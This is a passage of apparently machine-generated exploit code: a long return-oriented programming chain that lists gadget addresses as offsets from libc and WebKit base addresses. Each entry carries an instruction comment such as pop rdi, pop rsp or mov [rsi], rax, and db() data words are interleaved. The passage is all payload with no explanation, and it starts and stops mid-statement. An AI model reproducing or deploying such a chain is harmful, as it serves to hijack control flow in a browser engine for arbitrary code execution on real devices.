libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8736: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+415296, //L8738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+415312, //L8739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+415280, //L8737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8737: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8738: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8739: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+415392, //L8740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+415408, //L8741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8740: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8741: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+415504, //L8743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+415488, //L8742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8742: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8743: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+415584, //L8744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8744: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8745: db([111, 0]); // 0x6f 
set_gadget(libc_base+144605,); //pop rdi //L8746: db([111, 0]); // 0x6f set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+415728, //L8747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+415760, //L8749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+415744, //L8748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8747: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8748: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8749: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+415928, //L8751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+415944, //L8752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+415912, //L8750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8750: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8751: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8752: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+416056, //L8754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+416104, //L8757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+416072, //L8755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
]); //L8754: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8755: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8756: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8757: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+416216, //L8758+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+416208, //L8758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8758: db([0, 0]); // 0x0 set_gadgets([ ropchain+416232, //L8758+24 ropchain+416472, //L8753 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+416288, //L8760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8759: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8760: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8761: db([8, 0]); // 0x8 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+416368, //L8762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8762: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8764: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+416448, //L8766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8766: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+420168, //L8765 //L8753: libc_base+764760, //pop rsi ropchain+416512, //L8768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8768: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L8770: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+416632, //L8773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+416616, //L8771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8771: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8773: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+416712, //L8774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+416728, //L8775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8774: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8775: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+416888, //L8779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+416856, //L8777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+416872, //L8778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8776: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8777: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8778: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8779: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+416944, //L8781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8781: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+417072, //L8783 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+417088, //L8784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417056, //L8782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8782: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8783: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8784: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+417248, //L8788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+417216, //L8786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417232, //L8787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8785: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8786: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8788: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+417304, //L8790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8790: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+417432, //L8792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+417448, //L8793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417416, //L8791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8791: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8792: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L8793: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+417608, //L8797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+417576, //L8795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417592, //L8796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8794: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8795: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8796: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8797: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+417664, //L8799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8799: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+417792, //L8801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+417808, //L8802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417776, //L8800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8800: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8801: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8802: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+417888, //L8803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+417904, //L8804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8803: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L8804: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+418000, //L8806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+417984, //L8805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8805: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8806: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+418080, //L8807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8807: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8808: db([98, 0]); // 0x62 set_gadget(libc_base+144605,); //pop rdi //L8809: db([98, 0]); // 0x62 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+418224, //L8810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+418256, //L8812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+418240, //L8811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8811: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8812: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+418424, //L8814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, 
//mov rax, [rsi] libc_base+764760, //pop rsi ropchain+418440, //L8815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+418408, //L8813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8815: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+418552, //L8817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+418600, //L8820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+418568, //L8818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8817: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8818: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8819: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8820: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+418712, //L8821+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+418704, //L8821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8821: db([0, 0]); // 0x0 set_gadgets([ ropchain+418728, //L8821+24 ropchain+418968, //L8816 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+418784, //L8823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8822: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8823: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8824: db([2, 0]); 
// 0x2 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+418864, //L8825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8825: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8827: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+418944, //L8829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8829: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+420168, //L8828 //L8816: libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+419024, //L8832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8831: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8833: db([10, 0]); // 0xa set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+419104, //L8834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8834: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8836: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8838: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+419264, //L8841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+419248, //L8839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8839: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8841: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+419440, //L8844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+419456, //L8845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+419408, //L8842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+419424, //L8843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8842: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8843: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8844: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8845: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+419552, //L8847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+419536, //L8846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8846: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8847: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8848: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8849: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L8850: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+419760, //L8852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L8851: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L8852: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+419824, //L8854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8854: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+419880, //L8855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8855: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+420016, //L8859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+420000, //L8858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8857: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8858: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8859: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+420080, //L8860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8862: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+420160, //L8863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8863: db([0, 0]); // 0x0 //L8828: //L8765: //L8702: set_gadgets([ libc_base+764760, //pop rsi ropchain+420208, //L8865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8865: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8867: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+420328, //L8870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+420312, //L8868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8868: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8870: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+420408, //L8871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+420424, //L8872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8872: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+420584, //L8876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+420552, //L8874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+420568, //L8875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8873: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8874: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8875: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8876: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+420640, //L8878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8878: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+420768, //L8880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+420784, //L8881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+420752, //L8879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8879: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8880: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8881: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+420944, //L8885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+420912, //L8883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+420928, //L8884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8882: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8883: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8884: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8885: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+421000, //L8887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8887: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+421128, //L8889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+421144, //L8890 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+421112, //L8888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8888: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8889: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8890: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+421304, //L8894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+421272, //L8892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+421288, //L8893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8891: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8892: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8893: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8894: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+421360, //L8896 webkit_base+660161, //mov [rsi], 